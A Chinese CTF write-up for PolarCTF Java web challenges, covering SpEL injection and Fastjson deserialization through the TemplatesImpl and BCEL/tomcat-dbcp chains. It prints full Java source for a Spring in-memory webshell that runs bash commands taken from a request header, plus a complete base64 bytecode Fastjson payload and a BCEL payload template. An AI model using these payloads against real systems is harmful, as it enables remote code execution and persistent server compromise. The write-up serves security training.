参考infernity师傅的:文章 - PolarCTF靶场 WEB方向java题目全题解 - 先知社区

ezjava

源码:

image-20250325140258704

一眼丁真看到parseExpression函数,鉴定为:SpEL注入。

试着用最基本的Runtime执行命令:

image-20250325140434061

ls /没报错,鉴定为Linux,无回显。

打无回显Payload:

image-20250325140327452

Fastjson

踩坑!踩坑!

Spring内存马:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class shell extends AbstractTranslet {
    public shell() {
        try {
            org.springframework.web.context.request.RequestAttributes requestAttributes = org.springframework.web.context.request.RequestContextHolder.getRequestAttributes();
            javax.servlet.http.HttpServletRequest httprequest = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getRequest();
            javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
            String[] cmd =  new String[]{"bash", "-c", httprequest.getHeader("xiaofuc")};  //请求头加一个Infernity后面加命令
            byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes();
            httpresponse.getWriter().write(new String(result));
            httpresponse.getWriter().flush();
            httpresponse.getWriter().close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws
            TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator,
                          SerializationHandler handler) throws TransletException {
    }
}

我原来一直用命令行中的javac进行编译,但是一直因为依赖和JDK版本的问题而报错。

才发现IDEA里面是可以一键编译的:

image-20250325222829767

打开powershell,把class编码成Base64:

image-20250325222852800

payload:

1
{"@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes": ["yv66vgAAADQAhwoAHQBDCgBEAEUHAEYKAAMARwoAAwBIBwBJCABKCABLCABMCwBNAE4HAE8HAFAKAAwAUQoADABSCgBTAFQKAAsAVQgAVgoACwBXCgALAFgKAAYAWQsAWgBbCgAGAFwKAF0AXgoAXQBfCgBdAGAHAGEKABoAYgcAYwcAZAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBABFyZXF1ZXN0QXR0cmlidXRlcwEAO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXM7AQALaHR0cHJlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAxodHRwcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQADY21kAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEABHRoaXMBAAdMc2hlbGw7AQANU3RhY2tNYXBUYWJsZQcAYwcAYQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwBlAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAKc2hlbGwuamF2YQwAHgAfBwBmDABnAGgBAEBvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvU2VydmxldFJlcXVlc3RBdHRyaWJ1dGVzDABpAGoMAGsAbAEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMBAAd4aWFvZnVjBwBtDABuAG8BABFqYXZhL3V0aWwvU2Nhbm5lcgEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgwAHgBwDABxAHIHAHMMAHQAdQwAHgB2AQACXEEMAHcAeAwAeQB6DAB7AHwHAH0MAH4AfwwAHgCABwCBDACCAIMMAIQAHwwAhQAfAQATamF2YS9pby9JT0V4Y2VwdGlvbgwAhgAfAQAFc2hlbGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQA8b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RDb250ZXh0SG9sZGVyAQAUZ2V0UmVxdWVzdEF0dHJpYnV0ZXMBAD0oKUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXM7AQAKZ2V0UmVxdWVzdAEAKSgpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQALZ2V0UmVzcG9uc2UBACooKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAJZ2V0SGVhZGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0AQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhnZXRCeXRlcwEABCgpW0IBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAFKFtCKVYBABNqYXZhL2lvL1ByaW50V3JpdGVyAQAFd3JpdGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAVmbHVzaAEABWNsb3NlAQAPcHJpbnRTdGFja1RyYWNlACEAHAAdAAAAAAADAAEAHgAfAAEAIAAAATcABQAGAAAAgyq3AAG4AAJMK8AAA7YABE0rwAADtgAFTga9AAZZAxIHU1kEEghTWQUsEgm5AAoCAFM6BLsAC1m7AAxZGQS3AA22AA62AA+3ABASEbYAErYAE7YAFDoFLbkAFQEAuwAGWRkFtwAWtgAXLbkAFQEAtgAYLbkAFQEAtgAZpwAITCu2ABuxAAEABAB6AH0AGgADACEAAAA2AA0AAAAKAAQADAAIAA0AEAAOABgADwAzABAAVgARAGgAEgBxABMAegAWAH0AFAB+ABUAggAXACIAAABIAAcACAByACMAJAABABAAagAlACYAAgAYAGIAJwAoAAMAMwBHACkAKgAEAFYAJAArACwABQB+AAQALQAuAAEAAACDAC8AMAAAADEAAAAQAAL/AH0AAQcAMgABBwAzBAABADQANQACACAAAAA/AAAAAwAAAAGxAAAAAgAhAAAABgABAAAAHAAiAAAAIAADAAAAAQAvADAAAAAAAAEANgA3AAEAAAABADgAOQACADoAAAAEAAEAOwABADQAPAACACAAAABJAAAABAAAAAGxAAAAAgAhAAAABgABAAAAIQAiAAAAKgAEAAAAAQAvADAAAAAAAAEANgA3AAEAAAABAD0APgACAAAAAQA/AEAAAwA6AAAABAABADsAAQBBAAAAAgBC"],'_name': 'xiaofuc','_tfactory': {},"_outputProperties": {}}

之后在请求头中加入:

xiaofuc: cat fastFLAG.txt

image-20250325222948686

FastjsonBCEL

一开始看到依赖版本是1.2.24,想打TemplatesImpl链子的,后来发现没有用,因为依赖中不存在CC链。。

看到还加载了tomcat-dbcp,结合题目名字就能想到可以打BCEL注入。

Payload:

1
2
3
4
5
6
7
8
9
10
11
{
    {
      "aaa": {
              "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
              "driverClassLoader": {
                  "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
              },
              "driverClassName": "$$BCEL$$$l$8b$I$A$..."
        }
    }:"bbb"
}

BCEL恶意字节码填入Spring内存马即可。

image-20250327130301508